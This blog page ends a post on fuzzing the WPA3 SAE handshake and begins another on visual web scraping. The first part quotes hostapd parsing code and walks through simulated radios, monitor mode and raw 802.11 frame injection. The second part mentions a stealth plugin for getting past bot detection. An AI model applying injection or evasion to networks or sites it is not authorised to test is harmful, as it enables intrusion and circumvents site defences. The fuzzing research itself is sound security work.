<span class="w"> </span><span class="n">pos</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">WLAN_EID_EXTENSION</span><span class="w"> </span><span class="o">&&</span><span class="w"></span>
<span class="w"> </span><span class="n">pos</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span><span class="w"> </span><span class="o">>=</span><span class="w"> </span><span class="mi">1</span><span class="w"> </span><span class="o">&&</span><span class="w"></span>
<span class="w"> </span><span class="n">end</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">pos</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="mi">2</span><span class="w"> </span><span class="o">>=</span><span class="w"> </span><span class="n">pos</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span><span class="w"> </span><span class="o">&&</span><span class="w"></span>
<span class="w"> </span><span class="n">pos</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">WLAN_EID_EXT_PASSWORD_IDENTIFIER</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>Even the source code responsible for parsing the password identifier complains about the ambiguity of parsing the password identifier.</p>
<div class="highlight"><pre><span></span><code><span class="k">static</span><span class="w"> </span><span class="kt">void</span><span class="w"> </span><span class="nf">sae_parse_commit_token</span><span class="p">(</span><span class="k">struct</span><span class="w"> </span><span class="nc">sae_data</span><span class="w"> </span><span class="o">*</span><span class="n">sae</span><span class="p">,</span><span class="w"> </span><span class="k">const</span><span class="w"> </span><span class="n">u8</span><span class="w"> </span><span class="o">**</span><span class="n">pos</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="k">const</span><span class="w"> </span><span class="n">u8</span><span class="w"> </span><span class="o">*</span><span class="n">end</span><span class="p">,</span><span class="w"> </span><span class="k">const</span><span class="w"> </span><span class="n">u8</span><span class="w"> </span><span class="o">**</span><span class="n">token</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="kt">size_t</span><span class="w"> </span><span class="o">*</span><span class="n">token_len</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="kt">size_t</span><span class="w"> </span><span class="n">scalar_elem_len</span><span class="p">,</span><span class="w"> </span><span class="n">tlen</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">const</span><span class="w"> </span><span class="n">u8</span><span class="w"> </span><span class="o">*</span><span class="n">elem</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">token</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="o">*</span><span class="n">token</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nb">NULL</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">token_len</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="o">*</span><span class="n">token_len</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">scalar_elem_len</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">sae</span><span class="o">-></span><span class="n">tmp</span><span class="o">-></span><span class="n">ec</span><span class="w"> </span><span class="o">?</span><span class="w"> </span><span class="mi">3</span><span class="w"> </span><span class="o">:</span><span class="w"> </span><span class="mi">2</span><span class="p">)</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">sae</span><span class="o">-></span><span class="n">tmp</span><span class="o">-></span><span class="n">prime_len</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">scalar_elem_len</span><span class="w"> </span><span class="o">>=</span><span class="w"> </span><span class="p">(</span><span class="kt">size_t</span><span class="p">)</span><span class="w"> </span><span class="p">(</span><span class="n">end</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="o">*</span><span class="n">pos</span><span class="p">))</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="p">;</span><span class="w"> </span><span class="cm">/* No extra data beyond peer scalar and element */</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* It is a bit difficult to parse this now that there is an</span>
<span class="cm"> * optional variable length Anti-Clogging Token field and</span>
<span class="cm"> * optional variable length Password Identifier element in the</span>
<span class="cm"> * frame. We are sending out fixed length Anti-Clogging Token</span>
<span class="cm"> * fields, so use that length as a requirement for the received</span>
<span class="cm"> * token and check for the presence of possible Password</span>
<span class="cm"> * Identifier element based on the element header information.</span>
<span class="cm"> */</span><span class="w"></span>
<span class="w"> </span><span class="n">tlen</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">end</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="p">(</span><span class="o">*</span><span class="n">pos</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">scalar_elem_len</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">tlen</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="n">SHA256_MAC_LEN</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">wpa_printf</span><span class="p">(</span><span class="n">MSG_INFO</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="s">"SAE: Too short optional data (%u octets) to include our Anti-Clogging Token"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">int</span><span class="p">)</span><span class="w"> </span><span class="n">tlen</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">wpa_printf</span><span class="p">(</span><span class="n">MSG_INFO</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="s">"SAE: Potential Anti-Clogging Token"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">elem</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="o">*</span><span class="n">pos</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">scalar_elem_len</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">sae_is_password_id_elem</span><span class="p">(</span><span class="n">elem</span><span class="p">,</span><span class="w"> </span><span class="n">end</span><span class="p">))</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* Password Identifier element takes out all available</span>
<span class="cm"> * extra octets, so there can be no Anti-Clogging token in</span>
<span class="cm"> * this frame. */</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">wpa_printf</span><span class="p">(</span><span class="n">MSG_INFO</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="s">"SAE: No password ident after scalar and element"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">elem</span><span class="w"> </span><span class="o">+=</span><span class="w"> </span><span class="n">SHA256_MAC_LEN</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">sae_is_password_id_elem</span><span class="p">(</span><span class="n">elem</span><span class="p">,</span><span class="w"> </span><span class="n">end</span><span class="p">))</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* Password Identifier element is included in the end, so</span>
<span class="cm"> * remove its length from the Anti-Clogging token field. */</span><span class="w"></span>
<span class="w"> </span><span class="n">tlen</span><span class="w"> </span><span class="o">-=</span><span class="w"> </span><span class="mi">2</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">elem</span><span class="p">[</span><span class="mi">1</span><span class="p">];</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">wpa_printf</span><span class="p">(</span><span class="n">MSG_INFO</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="s">"SAE: No password ident after scalar and element and anti-clogging-token"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">wpa_hexdump</span><span class="p">(</span><span class="n">MSG_INFO</span><span class="p">,</span><span class="w"> </span><span class="s">"SAE: Anti-Clogging Token"</span><span class="p">,</span><span class="w"> </span><span class="o">*</span><span class="n">pos</span><span class="p">,</span><span class="w"> </span><span class="n">tlen</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">token</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="o">*</span><span class="n">token</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="o">*</span><span class="n">pos</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">token_len</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="o">*</span><span class="n">token_len</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">tlen</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="o">*</span><span class="n">pos</span><span class="w"> </span><span class="o">+=</span><span class="w"> </span><span class="n">tlen</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
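<p>To see why this parsing is fragile, the length logic of the C function above can be re-expressed in a few lines of Python. This is only a sketch: the helper <code>is_password_id_elem</code> and the two element ID constants are assumptions modelled on the name <code>sae_is_password_id_elem</code>, not code copied from the original source, and <code>body</code> is assumed to hold everything that follows the group field.</p>

```python
SHA256_MAC_LEN = 32  # fixed token length the parser expects
WLAN_EID_EXTENSION = 255  # assumed ID of an extension element
WLAN_EID_EXT_PASSWORD_IDENTIFIER = 33  # assumed extension ID (hypothetical here)


def is_password_id_elem(buf, offset):
    """Assumed header check: does a Password Identifier element start here?"""
    remaining = len(buf) - offset
    return (
        remaining >= 3
        and buf[offset] == WLAN_EID_EXTENSION
        and buf[offset + 1] >= 1
        and remaining - 2 >= buf[offset + 1]
        and buf[offset + 2] == WLAN_EID_EXT_PASSWORD_IDENTIFIER
    )


def token_length(body, prime_len, is_ecc):
    """Mirror the C logic: how many leading octets are treated as the token?"""
    scalar_elem_len = (3 if is_ecc else 2) * prime_len
    if scalar_elem_len >= len(body):
        return 0  # no extra data beyond scalar and element
    tlen = len(body) - scalar_elem_len
    if tlen < SHA256_MAC_LEN:
        return 0  # too short to contain our token
    elem = scalar_elem_len
    if is_password_id_elem(body, elem):
        return 0  # all extra octets belong to a Password Identifier element
    elem += SHA256_MAC_LEN
    if is_password_id_elem(body, elem):
        tlen -= 2 + body[elem + 1]  # strip the trailing element from the token
    return tlen


token = b"\x11" * 32
scalar_and_element = b"\x00" * 96  # ECC with a 32-byte prime: 3 * 32 octets
password_id = bytes([255, 3, 33]) + b"pw"
print(token_length(token + scalar_and_element, 32, True))
print(token_length(token + scalar_and_element + password_id, 32, True))
```

<p>Under this assumed layout, the first element check looks at octets that belong to the peer's scalar and element whenever a token is present, so the frame contents themselves decide how the rest of the frame is interpreted.</p>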
<h4>Vendor Specific Parsing</h4>
<p>The <a href="https://mentor.ieee.org/802.11/dcn/19/11-19-0387-02-000m-addressing-some-sae-comments.docx">discussion in IEEE groups</a> shows clearly that implementers hold many misunderstandings and misconceptions about how Dragonfly should be implemented. This is usually a good indicator that there will be errors.</p>
<h4>Multiple Cryptographic Structures supported</h4>
<p>Dragonfly supports both Finite Field Cryptography (FFC) and Elliptic Curve Cryptography (ECC). This means that the kind of cryptography in use has to be detected from the contents of the frames, which is bad practice, to say the least. Most real-world implementations exclusively use ECC.</p>
<h2>Setting up the testing environment</h2>
<p>Playing around with 802.11 involves a lot of pain and frustration. Often things don't work as described on the Internet. In the following section, we will use the awesome <strong>mac80211_hwsim</strong> radio simulation kernel module. All software and instructions have been tested and run on <strong>Ubuntu 18.04</strong>.</p>
<p>The testing environment is created via hardware simulation of WiFi radios.</p>
<div class="highlight"><pre><span></span><code><span class="c1"># kill all interfering daemons such as network-manager</span>
sudo pkill wpa_supplicant
sudo service network-manager stop
<span class="c1"># create virtual 802.11 radios (radios=N sets how many are created)</span>
sudo modprobe mac80211_hwsim <span class="nv">radios</span><span class="o">=</span><span class="m">2</span>
rfkill unblock wifi
</code></pre></div>
<p>Enable monitoring of the simulated radio traffic in Wireshark with:</p>
<div class="highlight"><pre><span></span><code>sudo ifconfig hwsim0 up
</code></pre></div>
<p>Now you may observe the simulated traffic on the interface <strong>hwsim0</strong>.</p>
<h4>Before Fuzzing</h4>
<p>Sources:</p>
<ol>
<li><a href="https://stackoverflow.com/questions/48271119/how-to-send-both-802-11-management-frames-and-data-frames-using-raw-sockets-in-l">How to use raw sockets in 802.11</a></li>
<li><a href="https://www.aircrack-ng.org/doku.php?id=injection_test">Injection Test</a></li>
</ol>
<p>Before starting, it might be worthwhile to find out the details of your wireless card. You can do so with the command <code>sudo lshw -class network</code>. In my case, the output is the following:</p>
<div class="highlight"><pre><span></span><code>$ sudo lshw -class network
<span class="o">[</span>sudo<span class="o">]</span> password <span class="k">for</span> nikolai:
*-network
description: Wireless interface
product: Centrino Advanced-N <span class="m">6235</span>
vendor: Intel Corporation
physical id: <span class="m">0</span>
bus info: pci@0000:02:00.0
logical name: wlan0
version: <span class="m">24</span>
serial: <span class="m">00</span>:00:00:00:00:00 <span class="c1"># i changed this for obvious reasons</span>
width: <span class="m">64</span> bits
clock: 33MHz
capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless
configuration: <span class="nv">broadcast</span><span class="o">=</span>yes <span class="nv">driver</span><span class="o">=</span>iwlwifi <span class="nv">driverversion</span><span class="o">=</span><span class="m">4</span>.15.0-39-generic <span class="nv">firmware</span><span class="o">=</span><span class="m">18</span>.168.6.1 <span class="nv">ip</span><span class="o">=</span><span class="m">192</span>.168.0.4 <span class="nv">latency</span><span class="o">=</span><span class="m">0</span> <span class="nv">link</span><span class="o">=</span>yes <span class="nv">multicast</span><span class="o">=</span>yes <span class="nv">wireless</span><span class="o">=</span>IEEE <span class="m">802</span>.11
resources: irq:32 memory:f7d00000-f7d01fff
</code></pre></div>
<p>This gives you the interface name, driver used, MAC address of the card and so on.</p>
<p>In order to send management, data or any type of pure raw packet from a wireless interface you have to do the following:</p>
<p>Make sure the wireless interface hardware supports packet injection in monitor mode.</p>
<ul>
<li>To check the capabilities of your WiFi card, run the following command: <code>iw list | grep -A7 "interface modes:"</code>. If the output lists <strong>monitor</strong>, you are good to go.</li>
<li>To test whether injection works, you can use <code>aireplay-ng -9 -e teddy -a 00:de:ad:ca:fe:00 -i {AP interface} {STA interface}</code>.</li>
</ul>
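<p>If you prefer to do the monitor mode check from a script, the following sketch extracts the supported modes from the text that <code>iw list</code> prints. The function name <code>supported_modes</code> is made up for this example, and <code>SAMPLE</code> is a shortened, illustrative excerpt rather than real output from my card.</p>

```python
def supported_modes(iw_list_output):
    """Collect the entries listed under 'Supported interface modes:'."""
    modes = []
    in_section = False
    for line in iw_list_output.splitlines():
        stripped = line.strip()
        if stripped.startswith("Supported interface modes:"):
            in_section = True
            continue
        if in_section:
            if stripped.startswith("* "):
                modes.append(stripped[2:].strip())
            else:
                in_section = False  # first non-bullet line ends the section
    return modes


# Shortened, illustrative excerpt of `iw list` output (an assumption).
SAMPLE = """Wiphy phy0
    Supported interface modes:
         * IBSS
         * managed
         * AP
         * monitor
    Band 1:
"""

print("monitor" in supported_modes(SAMPLE))
```

<p>To run it against your own hardware, pass in the output of <code>subprocess.run(["iw", "list"], capture_output=True, text=True).stdout</code> instead of the sample string.</p>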
<p>Then put the wireless interface in monitor mode with</p>
<div class="highlight"><pre><span></span><code><span class="c1"># the first commands kill interfering processes</span>
airmon-ng check <span class="nb">kill</span>
service network-manager stop
pkill wpa_supplicant
<span class="c1"># this puts the card in monitor mode</span>
ifconfig <span class="o">{</span>dev<span class="o">}</span> down
iwconfig <span class="o">{</span>dev<span class="o">}</span> mode monitor
ifconfig <span class="o">{</span>dev<span class="o">}</span> up
<span class="c1"># this sets the appropriate channel</span>
iwconfig <span class="o">{</span>dev<span class="o">}</span> channel <span class="o">{</span>channel<span class="o">}</span>
</code></pre></div>
<p>Then you can create a raw socket in Python via:</p>
<div class="highlight"><pre><span></span><code><span class="kn">import</span> <span class="nn">socket</span>
<span class="n">ETH_P_ALL</span> <span class="o">=</span> <span class="mh">0x0003</span>  <span class="c1"># from linux/if_ether.h; dev is the name of the monitor mode interface</span>
<span class="n">s</span> <span class="o">=</span> <span class="n">socket</span><span class="o">.</span><span class="n">socket</span><span class="p">(</span><span class="n">socket</span><span class="o">.</span><span class="n">AF_PACKET</span><span class="p">,</span> <span class="n">socket</span><span class="o">.</span><span class="n">SOCK_RAW</span><span class="p">,</span> <span class="n">socket</span><span class="o">.</span><span class="n">htons</span><span class="p">(</span><span class="n">ETH_P_ALL</span><span class="p">))</span>
<span class="n">s</span><span class="o">.</span><span class="n">bind</span><span class="p">((</span><span class="n">dev</span><span class="p">,</span> <span class="n">ETH_P_ALL</span><span class="p">))</span>
</code></pre></div>
<p>Finally, build the appropriate radiotap header and prepend it to every 802.11 frame you construct, including management and control frames. Since you are basically bypassing the lower-level wireless driver code (which normally handles management and control frames), it becomes your job to include the radiotap header. <a href="https://www.radiotap.org/">Info about the radiotap header.</a></p>
<h4>Radiotap Header</h4>
<p>We need to include a radiotap header in our raw frames. </p>
<p>The radiotap header format is a mechanism to supply additional information about frames, from the driver to userspace applications such as libpcap, and from a userspace application to the driver for transmission. Designed initially for NetBSD systems by David Young, the radiotap header format provides more flexibility than the Prism or AVS header formats and allows the driver developer to specify an arbitrary number of fields based on a bitmask presence field in the radiotap header (<a href="https://www.radiotap.org/">Source</a>)</p>
<p>The radiotap header is not actually part of the 802.11 frames that are sent over the air; it is merely an additional layer of information that is added by the wireless device/driver and passed into userland. A very good introduction to radiotap headers by Andy Green <a href="https://www.kernel.org/doc/Documentation/networking/mac80211-injection.txt">can be found here</a>. The 802.11 driver subsystem <strong>mac80211</strong> requires all injected packets to have a radiotap header. Another <a href="https://www.linux.com/blog/linux-wireless-networking-short-walk">very good blog post</a> explains the Linux wireless subsystem and the paths that management frames and data frames take within it.</p>
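<p>To make the layout concrete, here is a minimal sketch that builds and parses the fixed part of a radiotap header with Python's <code>struct</code> module. The fixed part consists of a version byte, a padding byte, a little-endian 16-bit total length and a little-endian 32-bit presence bitmask. The function names are made up for this example.</p>

```python
import struct

# version (u8), pad (u8), total header length (le16), present bitmask (le32)
RADIOTAP_FIXED = "<BBHI"


def build_radiotap_header(present=0, fields=b""):
    """Return a radiotap header; `fields` must match the `present` bitmask."""
    length = struct.calcsize(RADIOTAP_FIXED) + len(fields)
    return struct.pack(RADIOTAP_FIXED, 0, 0, length, present) + fields


def parse_radiotap_header(frame):
    """Split a captured or injected frame into header info and 802.11 payload."""
    version, _pad, length, present = struct.unpack_from(RADIOTAP_FIXED, frame, 0)
    return version, length, present, frame[length:]


header = build_radiotap_header()  # no optional fields at all
print(header.hex())
print(parse_radiotap_header(header + b"\xb0\x00"))
```

<p>With an empty presence bitmask the header is exactly eight bytes long, which is the smallest header that is still valid.</p>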
<p>This raises the question of whether the radiotap header itself can be fuzzed.</p>
<p>We will use the smallest possible radiotap header in <code>dragonfuzz.py</code> and let the 802.11 driver derive the proper values.</p>
<div class="highlight"><pre><span></span><code><span class="c1"># no flags present, let the 802.11 driver add the stuff</span>
<span class="n">DEFAULT_RADIOTAP_HEADER</span> <span class="o">=</span> <span class="sa">b</span><span class="s1">'</span><span class="se">\x00\x00\x08\x00\x00\x00\x00\x00</span><span class="s1">'</span>
</code></pre></div>Struktur: A completely new approach to web scraping2019-07-15T16:00:00+02:002019-07-15T16:00:00+02:00Nikolai Tschachertag:incolumitas.com,2019-07-15:/2019/07/15/web-scraping-without-css-selectors/<p>I will show an alternative approach to web scraping that does not use CSS selectors or XPath queries. We make use of the fact that most web pages visually render the information of interest in a coherent, structured way. This technique requires a remotely controllable web browser, for example one driven by puppeteer, that is capable of rendering web pages visually.</p><p>For the past couple of years, I have spent a lot of time creating web scrapers and information extraction tools for clients and <a href="https://scrapeulous.com/">my own service</a>. Recently, I had an idea for how to improve the quality of results while spending less time on data extraction rules. The result of this work is the experimental JavaScript project <a href="https://github.com/NikolaiT/struktur"><strong>struktur.js</strong></a>.</p>
<p>Web scraping is soul crushing work. There are mainly <strong>two reasons</strong> for that:</p>
<h3>Reason 1: CSS Selectors and XPath queries are hard to maintain</h3>
<p>Whenever a website's markup changes, you need to adapt your selectors. Furthermore, those selectors assume a static response from the scraped web server. If the structure changes slightly, the predefined CSS selectors fail miserably and the complete scrape job has to be restarted.</p>
<p>Many websites also have randomized class names and IDs in their HTML markup, such that those attributes carry no semantic information and cannot be used in CSS selectors. For example, this is the HTML that Google returns:</p>
<figure>
<img src="/images/badhtml.png" alt="bad html in google markup" style="width: 800px;"/>
<figcaption>Figure 1: Google randomises class names and makes it hard to figure out semantically rich CSS selectors</figcaption>
</figure>
<p>Nowadays, many websites are written in a JavaScript frontend framework such as Angular or ReactJS. This reinforces the trend towards class names that have no semantic relation to their content.</p>
<p>I finally decided to look for an alternative way of web scraping when I had to commit the following code into <a href="https://github.com/NikolaiT/se-scraper">se-scraper</a>:</p>
<div class="highlight"><pre><span></span><code><span class="c1">// parse right side product information</span>
<span class="kd">var</span> <span class="nx">right_side_info</span> <span class="o">=</span> <span class="p">{};</span>
<span class="nx">right_side_info</span><span class="p">.</span><span class="nx">review</span> <span class="o">=</span> <span class="nx">$</span><span class="p">(</span><span class="s1">'#rhs .cu-container g-review-stars span'</span><span class="p">).</span><span class="nx">attr</span><span class="p">(</span><span class="s1">'aria-label'</span><span class="p">);</span>
<span class="nx">right_side_info</span><span class="p">.</span><span class="nx">title</span> <span class="o">=</span> <span class="nx">$</span><span class="p">(</span><span class="s1">'#rhs .cu-container g-review-stars'</span><span class="p">).</span><span class="nx">parent</span><span class="p">().</span><span class="nx">find</span><span class="p">(</span><span class="s1">'div:first-child'</span><span class="p">).</span><span class="nx">text</span><span class="p">();</span>
<span class="nx">right_side_info</span><span class="p">.</span><span class="nx">num_reviews</span> <span class="o">=</span> <span class="nx">$</span><span class="p">(</span><span class="s1">'#rhs .cu-container g-review-stars'</span><span class="p">).</span><span class="nx">parent</span><span class="p">().</span><span class="nx">find</span><span class="p">(</span><span class="s1">'div:nth-of-type(2)'</span><span class="p">).</span><span class="nx">text</span><span class="p">();</span>
<span class="nx">right_side_info</span><span class="p">.</span><span class="nx">vendors</span> <span class="o">=</span> <span class="p">[];</span>
<span class="nx">right_side_info</span><span class="p">.</span><span class="nx">info</span> <span class="o">=</span> <span class="nx">$</span><span class="p">(</span><span class="s1">'#rhs_block > div > div > div > div:nth-child(5) > div > div'</span><span class="p">).</span><span class="nx">text</span><span class="p">();</span>
<span class="nx">$</span><span class="p">(</span><span class="s1">'#rhs .cu-container .rhsvw > div > div:nth-child(4) > div > div:nth-child(3) > div'</span><span class="p">).</span><span class="nx">each</span><span class="p">((</span><span class="nx">i</span><span class="p">,</span> <span class="nx">element</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="nx">right_side_info</span><span class="p">.</span><span class="nx">vendors</span><span class="p">.</span><span class="nx">push</span><span class="p">({</span>
<span class="nx">price</span><span class="o">:</span> <span class="nx">$</span><span class="p">(</span><span class="nx">element</span><span class="p">).</span><span class="nx">find</span><span class="p">(</span><span class="s1">'span:nth-of-type(1)'</span><span class="p">).</span><span class="nx">text</span><span class="p">(),</span>
<span class="nx">merchant_name</span><span class="o">:</span> <span class="nx">$</span><span class="p">(</span><span class="nx">element</span><span class="p">).</span><span class="nx">find</span><span class="p">(</span><span class="s1">'span:nth-child(3) a:nth-child(2)'</span><span class="p">).</span><span class="nx">text</span><span class="p">(),</span>
<span class="nx">merchant_ad_link</span><span class="o">:</span> <span class="nx">$</span><span class="p">(</span><span class="nx">element</span><span class="p">).</span><span class="nx">find</span><span class="p">(</span><span class="s1">'span:nth-child(3) a:first-child'</span><span class="p">).</span><span class="nx">attr</span><span class="p">(</span><span class="s1">'href'</span><span class="p">),</span>
<span class="nx">merchant_link</span><span class="o">:</span> <span class="nx">$</span><span class="p">(</span><span class="nx">element</span><span class="p">).</span><span class="nx">find</span><span class="p">(</span><span class="s1">'span:nth-child(3) a:nth-child(2)'</span><span class="p">).</span><span class="nx">attr</span><span class="p">(</span><span class="s1">'href'</span><span class="p">),</span>
<span class="nx">source_name</span><span class="o">:</span> <span class="nx">$</span><span class="p">(</span><span class="nx">element</span><span class="p">).</span><span class="nx">find</span><span class="p">(</span><span class="s1">'span:nth-child(4) a'</span><span class="p">).</span><span class="nx">text</span><span class="p">(),</span>
<span class="nx">source_link</span><span class="o">:</span> <span class="nx">$</span><span class="p">(</span><span class="nx">element</span><span class="p">).</span><span class="nx">find</span><span class="p">(</span><span class="s1">'span:nth-child(4) a'</span><span class="p">).</span><span class="nx">attr</span><span class="p">(</span><span class="s1">'href'</span><span class="p">),</span>
<span class="nx">info</span><span class="o">:</span> <span class="nx">$</span><span class="p">(</span><span class="nx">element</span><span class="p">).</span><span class="nx">find</span><span class="p">(</span><span class="s1">'div span'</span><span class="p">).</span><span class="nx">text</span><span class="p">(),</span>
<span class="nx">shipping</span><span class="o">:</span> <span class="nx">$</span><span class="p">(</span><span class="nx">element</span><span class="p">).</span><span class="nx">find</span><span class="p">(</span><span class="s1">'span:last-child > span'</span><span class="p">).</span><span class="nx">text</span><span class="p">(),</span>
<span class="p">})</span>
<span class="p">});</span>
</code></pre></div>
<p>This code is ugly and probably breaks in a couple of weeks. Then I need at least two hours of my time to fix it. I simply cannot do this for 10 different websites where I have to maintain a different set of scraping rules via CSS selectors.</p>
<h3>Reason 2: Websites have built in defenses against web scraping</h3>
<p>Of course it is reasonable to protect yourself against excessive and malicious scraping attempts. Nobody wants to have their whole body of data scraped by third parties. The reason is obvious: The value of many providers lies in the richness of the information they hold. For example, LinkedIn's value depends largely on its information monopoly about people in the business workforce. For this reason, they employ very strict defenses against large-scale scraping.</p>
<p>Those defenses block clients based on</p>
<ul>
<li>IP addresses</li>
<li>User agents and other HTTP headers</li>
<li>whether the client has a javascript execution engine</li>
<li>number of interactions on the site, mouse movements, swiping behavior, pauses</li>
<li>whether the client has a previously known profile</li>
<li>captchas</li>
</ul>
<p>It all boils down to the question of whether the client is a <strong>robot or a human</strong>. There is a large industry that tries to detect bots. Well-known companies in this industry are Distil and <a href="https://www.imperva.com/products/bot-management/">Imperva</a>. They try to distinguish bots from humans with machine learning models that use indicators such as mouse movements, swipe behavior on mobile apps, accelerometer statistics and device fingerprints. This topic has enough depth for another major blog post and will not be explored here any further.</p>
<h2>Scraping without a single CSS selector - Detecting Structures</h2>
<p>We cannot do much about web scraping defenses, since they are implemented on the server side. We can only invest more in resources such as IP addresses or proxies to obtain a larger scraping infrastructure.</p>
<p>In this blog post, we will tackle the first issue, the problem of <strong>reliably detecting relevant structure across websites without using XPath or CSS selectors</strong>. But what exactly is relevant structure?</p>
<p>In the remainder of this article, we define <strong>relevant structure to be a collection of similar objects which are of interest to the user.</strong> Our task is to recognize this structure on any web page on the Internet. It is a collection if there are at least <em>N</em> objects with the same <code>tagName</code> under a container node. The objects are similar if their visible content is similar. Of course, this is a circular definition, because how exactly to measure similarity is still an open question.</p>
<h3>Examples of recurring structure</h3>
<figure>
<img src="/images/google.png" alt="google structure example" style="width: 800px;"/>
<figcaption>Figure 2: The Google Search Engine has 10 result objects that each consist of a title, link and snippet.</figcaption>
</figure>
<figure>
<img src="/images/bing.png" alt="bing structure example" style="width: 800px;"/>
<figcaption>Figure 3: Bing has a very similar layout to Google.</figcaption>
</figure>
<figure>
<img src="/images/ebay.png" alt="ebay structure example" style="width: 800px;"/>
<figcaption>Figure 4: The ebay product search results page has many products that are rendered in a grid system and each share a product image, price and title.</figcaption>
</figure>
<p>All those items have a common structure when interpreted visually: They have more or less the same vertical alignment, the same font size, the same html tag within the same hierarchy level.</p>
<p>The huge problem is that structure is created dynamically from the interplay of HTML, JavaScript and CSS. This means that the HTML structure does not necessarily need to resemble the visual output. Therefore we need to operate on a rendered web page. This implies that we need to scrape with real, headless browsers using libraries such as <a href="https://github.com/GoogleChrome/puppeteer">puppeteer</a>.</p>
<h3>What assumptions do we make?</h3>
<p>The input is a website rendered by a modern browser with JavaScript support. We will use puppeteer to render websites and <strong>puppeteer-extra-plugin-stealth</strong> to make the automated browser look like a regular one.</p>
<p>We assume that structure is what humans consider to be related structure.</p>
<ol>
<li>Reading goes from top-left to bottom-right</li>
<li>Identical horizontal/vertical alignment among objects</li>
<li>More or less same size of bounding rectangles of the object of interest</li>
<li>As output we are merely interested in Links, Text and Images (which are Links). The output needs to be visible/displayed in the DOM.</li>
<li>Only structure that takes a major part of the visible viewport is considered structure</li>
<li>There must be at least N=6 objects within a container to be considered recurring structure</li>
</ol>
<p>Even when websites protect themselves against web scraping on the HTML level, they still need to present a rendered page to the non-malicious visitor at some point. Our approach is to extract the information at exactly that point, after rendering.</p>
